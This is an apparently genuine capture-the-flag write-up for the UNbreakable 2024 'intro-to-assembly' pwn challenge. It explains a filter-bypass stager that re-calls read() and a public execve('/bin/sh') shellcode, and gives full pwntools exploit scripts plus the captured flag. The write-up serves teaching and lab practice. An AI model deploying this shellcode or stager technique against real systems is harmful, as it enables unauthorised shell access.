UNBREAKABLE WRITEUP

# UNBREAKABLE CTF 2024 - WRITEUP ## The Challenge This challenge was apart of the UNbreakable 2024 CTF in the individual category. **Name:** Intro-to-assembly **Category:** Pwn **Difficulty:** Easy **Solves:** 24 **Description:** I want the shell, but they want me to work for it :( **File:** ## Discovery The first thing we see when we lay eyes upon this challenge is that we have access to an address where we can connect remotely and that we are given the binary file intro-to-assembly. If we open this file in IDA and go to the main function, this is what we get: ![image](https://hackmd.io/_uploads/r13eNRAA6.png) After analyzing it, we can confidently say that the function works as follows: - Uses the mmap() function to allocate 24 bytes of memory, with permissions set to read, write, and execute. - Uses the read() function to read 24 bytes from standard input into the buffer. - Initializes the 'dest' variable with zeros and then copies the input from 'buf' into 'dest' based on the length of the input. - Starts looping through each byte of the input. - Checks to see if the current byte is 0x31('1'), 0x0F or 0x05. - If found, it will print an error message and exit the program. - Otherwise, it will execute the buffer as code. In addition to the functionality described above, we can also address the _readfsqword(0x28u) which is used at the beginning and at the end. This represents the stack canary, a buffer overflow protection, which can also be confirmed by running the command ```checksec --file=intro-to-assembly``` : ![image](https://hackmd.io/_uploads/SJED2AARp.png) ## Exploitation & Debugging While the discovery phase was fairly straightforward, we now need to find a way to exploit the file. We know that we cannot do a buffer overflow and we know that we can input up to 24 bytes of code into the buffer. The first idea we could try is to see if we can input a syscall, but remember that we also have a check for specific bytes. If we use an online assembler we can see that 'syscall' has the raw hex bytes '0F05', exactly the sequence that we are prevented from using. The next idea we could try, is to first input a payload that would call the read function again. This might work because if we do this, the second time we input something, our input wouldn't pass through the byte-check and we can write whatever we want. Let's try it with the following input: ```assembly mov rsi,rdx push rax pop rdi mov rdx,0x100 push 0x401110 pop rax call rax ``` To explain how this works, we first specify that we store our input into rsi. Then we need a '0' in rdi in order to read from standard input. In our case, rax contained 0, so I moved the value of rax to rdi. Then we set rdx to '0x100' to specify how many bytes to read. After that, we can store the address of the PLT entry of the read function in rax and then call it. ![image](https://hackmd.io/_uploads/BJgZhX1k0.png) We can verify that code using an online assembler and we see this: ![image](https://hackmd.io/_uploads/H1-XpQy1C.png) So our input contains 20 bytes, so it fits into the 24 bytes we have allocated, and it also does not contain any of the restricted bytes. At the moment our code looks like this: ```python from pwn import * context.terminal = ['tmux','splitw','-h'] p = process("intro-to-assembly") shellcode = b"\x48\x89\xD6\x50\x5F\x48\xC7\xC2\x00\x01\x00\x00\x68\x10\x11\x40\x00\x58\xFF\xD0" # 20bytes len gdb.attach(p) p.send(shellcode) p.interactive() ``` Let's jump into gdb and see if we get the desired result. First we'll type `finish` so that we skip over the initialization code and get to the main function. Then, we'll type `disass main` to disassemble the main function. At this point we see this: ![image](https://hackmd.io/_uploads/S1omgNykR.png) So we're going to copy the address of call rdx, and set a breakpoint at that address. Then we'll type `continue` to go to it. We are interested in this address because that's where our input gets stored before it gets executed, which is confirmed by this snippet we can see in IDA: ![image](https://hackmd.io/_uploads/rJtoWVJy0.png) After we get to the `call rax` instruction, we can use `si` to step to the next instruction. ![image](https://hackmd.io/_uploads/S1vFGEyyR.png) Doing this, we see that the next instructions are precisely our code. Awesome! Now, if we continue to step through the following instructions, at some point we won't be able to anymore, as seen below: ![image](https://hackmd.io/_uploads/SJmImEyJ0.png) At this stage the program is actually waiting for our input. Now if we jump over to the left side of our terminal and input something, we can see on the right side that our program automatically jumps to the next instruction. ![image](https://hackmd.io/_uploads/H1KHVVyyC.png) If you look on the right side at the rsi register you can see that it points to our input, just like we told it to in our code. So it works as expected. So far so good, all we need to do now is to insert a payload in the second input that will give us shell access. We can use this one: ```assembly "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05" ``` The disassembled version looks like this: ```assembly 0: 31 c0 xor eax,eax 2: 48 bb d1 9d 96 91 d0 movabs rbx,0xff978cd091969dd1 9: 8c 97 ff c: 48 f7 db neg rbx f: 53 push rbx 10: 54 push rsp 11: 5f pop rdi 12: 99 cdq 13: 52 push rdx 14: 57 push rdi 15: 54 push rsp 16: 5e pop rsi 17: b0 3b mov al,0x3b 19: 0f 05 syscall ``` You can find this on the Internet and it requires no adjustments in order to work. However, I'm going to explain how it works, just because it's interesting to see. First of all, let's understand our purpose. We're planning to use the execve() syscall in order to gain access to the shell. What the syscall does is it starts a new process in place of the one currently running. If you look at the manual page I've added to the resources section, you'll see that the structure of the execve() syscall looks like this: ``` int execve(const char *pathname, char *const _Nullable argv[], char *const _Nullable envp[]); ``` As you can see, it takes 3 arguments: the pathname of the program to execute, an array of string arguments (argv) and an array of strings (envp) representing the environment variables for the new program. For the first argument, the path we're gonna need to specify is `bin/sh`, which will open a new shell instance. The second argument is an array in which you need to first specify the name of the executed program and then any other command-line arguments you want to pass to it. Since we don't want shell to start in a modified state, we need only the name. So our second argument should look like this: `["/bin/sh", NULL]`, with a NULL pointer at the end to specify the end of the array. The final argument will also be `NULL` since we don't require environment variables in this case. All together, our final syscall should look like this: `execve("/bin/sh", ["/bin/sh", NULL], NULL)`. Let's see how this payload accomplishes that. ```assembly xor eax, eax ``` - this is an efficient way of setting the eax register to 0 by xoring the value with itself. Which often uses less bytes than moving an immediate value into the register. eax will later be used to specify the syscall number. ```assembly movabs rbx,0xff978cd091969dd1 neg rbx push rbx ``` - these two work together in an interesting way. The first instruction moves the immediate value of `0xff978cd091969dd1` into rbx. Then the second instruction negates that value. The result of that negation is `0x0068732f6e69622e`. Doesn't seem interesting yet? Let's convert the resulting value to its ASCII representation. We get '0x00hs/nib.'. Now, considering this is in little-endian format, if we convert it to big-endian we get `'bin/sh0x00'`, which is essential in order to gain shell access. The reason this payload goes through the process of negating it is because if you were to pass the `0x0068732f6e69622e` value from the start, depending on how the code is interpreted, it might get terminated when it encounters the NULL byte(0x00). This way, we use `0xff978cd091969dd1` instead, therefore we avoid that. The third instruction just pushes the resulting value on the stack. ```assembly push rsp pop rdi ``` - pushes the value of rsp(stack pointer) onto the stack. This is done to get the address of the string `/bin/sh` on the stack. Then it pops that value into rdi, setting it up as the first argument to the execve syscall, which expects a pointer to the command to execute. ```assembly cdq ``` - this just represents a way to set rdx to 0, which will represent setting the third argument of the execve() function to NULL. In short, since we previously set eax to 0, the cdq instruction will copy the sign of eax into edx, making it 0, and since edx represents the lower 32 bits of rdx, rdx will also be 0. ```assembly push rdx push rdi push rsp pop rsi ``` - These instructions manipulate the stack to set up the second argument to execve, the array of arguments to the program. By pushing rdx (which is zero) and then rdi (address of /bin/sh), followed by rsp, the code effectively constructs an argv array with a single element (the address of /bin/sh) that is terminated by a NULL pointer. After that, it pops the top value off the stack into rsi, setting it up as the second argument to the execve syscall. This represents the argv array for /bin/sh. Below I attached a visualization of the stack. ``` +------------------+ <- Higher Memory Address | Address of "/bin/sh" | +------------------+ | NULL | +------------------+ | Address of argv[0] | <- rsp points here +------------------+ <- Lower Memory Address``` ``` ```assembly mov al,0x3b ``` - Moves 0x3b into the lower 8 bits of the eax register, preparing for the syscall invocation. 0x3b is 59 in decimal, which is the syscall number of execve() ```assembly syscall ``` - Executes the syscall instruction, with all the args we've set up so far. So in the end, `execve("/bin/sh", ["/bin/sh", NULL], NULL)` will be called, which will start a new instance of the shell, giving us access to execute arbitrary commands on the server. ```python from pwn import * context.terminal = ['tmux','splitw','-h'] p = process("intro-to-assembly") shellcode_first_input = b"\x48\x89\xD6\x50\x5F\x48\xC7\xC2\x00\x01\x00\x00\x68\x10\x11\x40\x00\x58\xFF\xD0" # 20bytes len gdb.attach(p) shellcode_second_input = "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05" # 27bytes len payload = 'A' * 0x15 + shellcode_second_input p.send(shellcode_first_input.ljust(0x18, b"\x90")) p.sendline(payload) p.interactive() ``` One part that was necessary to add to the code was the `.ljust(0x18,b"\x90")`. What this does is it adds some padding at the end of our first payload, specifically adding the byte `\x90`, representing the `NOP`, or "NO-OPERATION". This operation essentially does nothing. Which is very helpful to us. Why do we need it? Well, in the first debugging process we did, we didn't need it, because we were only sending one payload. But now we're sending two, which changes things. You probably noticed we are sending the first payload with send(), instead of sendline(). That is because if we were to use sendline(), the function would've added a `\n` at the end, which would be interpreted as shellcode and mess up our payload. As a consequence of not being able to add a 'new line', we also don't have a separator between the first payload and the second one. Due to the fact that both of the payloads are sent really fast one after another, either to our program, locally or to the server, remotely, the program won't be able to figure out where the first payload ends and where the second one begins, and so, when it reads and executes the first one, it might also take a chunk out of the second one(which it did, causing a segmentation fault). Since our payload is 20 bytes and the read() function reads 24 bytes, we just fill the rest of the input with `NOP`, which results in creating a clearer segmentation between the inputs and fixes the problem. This is only one way of fixing this. Another way would be to add `input("????")` between sending the first payload and the second one. That way when our first payload which calls the read function gets executed and reads input again, instead of automatically reading the second payload, it will just pause, and wait for you to press `enter`, and only then will the second input be sent. This also solves the problem. Another thing I added is the "AAA" padding, right before the second payload. This padding acts as a buffer zone, filling the memory space before the actual payload. If we remove it, you can see that after the read function, rsi points exactly at the beginning of our payload, and in the instructions, you can see that after the "ret", our payload starts from `push rdi`, which is the 9th instruction of our payload. That's definitely not good. ![Screenshot 2024-04-15 150941](https://hackmd.io/_uploads/rJQP35ql0.png) Now, if we keep the padding, `rsi` will start pointing at our `AAA` (represented as `414141`) which does nothing, paving the way up to where our instructions that need to be executed are placed. And as you can see below, after the `ret` our payload actually starts at the beginning, as designed. ![image](https://hackmd.io/_uploads/HkzOT59l0.png) If we run the debugging process we did above again, this time, instead of getting to a point where the program waits for input, we can keep stepping through instructions until the last syscall where we see this: ![image](https://hackmd.io/_uploads/Bk9m64k1R.png) As you can see, our payload worked. And so did our strategy. Even tho this payload contains the 0x0F 0x05 sequence, it didn't pass through the byte-check and it got executed without problems. Now before we move to the final step and get that flag, I just wanna point out a neat little detail. We've already seen how we bypassed the "illegal" byte check, but you might be wondering: how does our second payload work, considering it has a length of 27bytes and we write in the same memory area where mmap() mapped 24 bytes? Aren't we going over the limit? This scenario showcases a fundamental concept in computer architecture, specifically within memory management. The mmap function handles memory mapping by aligning it to the boundaries of a memory page. If you look in the resources posted at the end of this write-up, you'll see I linked the source code of how mmap() works. At the 1208th line, if we start reading we'll see this part: ``` len = PAGE_ALIGN(len); if (!len) return -ENOMEM; ``` This code rounds the length up to the nearest page size, which on most systems is typically 4KB, ensuring that even a request for 24 bytes results in the mapping of a full memory page. This page-aligned allocation strategy is crucial for the kernel as without such alignment, systems could face issues like memory fragmentation, where usable memory is wasted in small blocks, or security vulnerabilities due to inconsistent handling of memory access rights across differently sized blocks. Ok, now that we've also shown a bit about how memory management works, all we have to do now is comment out the local process and the gdb.attach in our code, and connect remotely like this: ```python from pwn import * context.terminal = ['tmux','splitw','-h'] #p = process("intro-to-assembly") p = remote("34.89.210.219",30895) shellcode_first_input = b"\x48\x89\xD6\x50\x5F\x48\xC7\xC2\x00\x01\x00\x00\x68\x10\x11\x40\x00\x58\xFF\xD0" # First shellcode modified. Used push rax instead of r12 #gdb.attach(p) shellcode_second_input = "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05" # 27bytes len payload = 'A' * 0x15 + shellcode_second_input p.send(shellcode_first_input.ljust(0x18, b"\x90")) p.sendline(payload) p.interactive() ``` ![image](https://hackmd.io/_uploads/HkRsR4Jy0.png) Running the file, we have shell access to the server and there's our flag: `CTF{926e420eeeeb6ac4890ddd46af5462d922e01307ef77d97d6799b167ed17e44f}` ## Conclusion Whilst this challenge was labeled as easy, being a pwn noob myself, I found it needed me to be pretty engaged in order to grasp all the concepts. Which is precisely the reason why I wrote this in a detailed step-by-step manner. I hope this write-up has been of use and you learned as much as I did from this challenge. ## Resources Online assembler/disassembler:https://defuse.ca/online-x86-assembler.htm#disassembly2 Functions manual pages: https://man7.org/linux/man-pages/man2/mmap.2.html https://man7.org/linux/man-pages/man2/read.2.html https://man7.org/linux/man-pages/man2/execve.2.html Mmap() source code: https://codebrowser.dev/linux/linux/include/linux/mm.h.html#221

Syntax	Example	Reference
# Header	Header	基本排版
- Unordered List	Unordered List
1. Ordered List	Ordered List
- [ ] Todo List	Todo List
> Blockquote	Blockquote
Bold font	Bold font
Italics font	Italics font
~~Strikethrough~~	~~Strikethrough~~
19^th^	19^th
H~2~O	H₂O
++Inserted text++	Inserted text
==Marked text==	Marked text
[link text](https:// "title")	Link
![image alt](https:// "title")	Image
`Code`	`Code`	在筆記中貼入程式碼
```javascript var i = 0; ```	`var i = 0;`
:smile:		Emoji list
{%youtube youtube_id %}	Externals
$L^aT_eX$	L^aT_eX
:::info This is a alert area. :::	This is a alert area.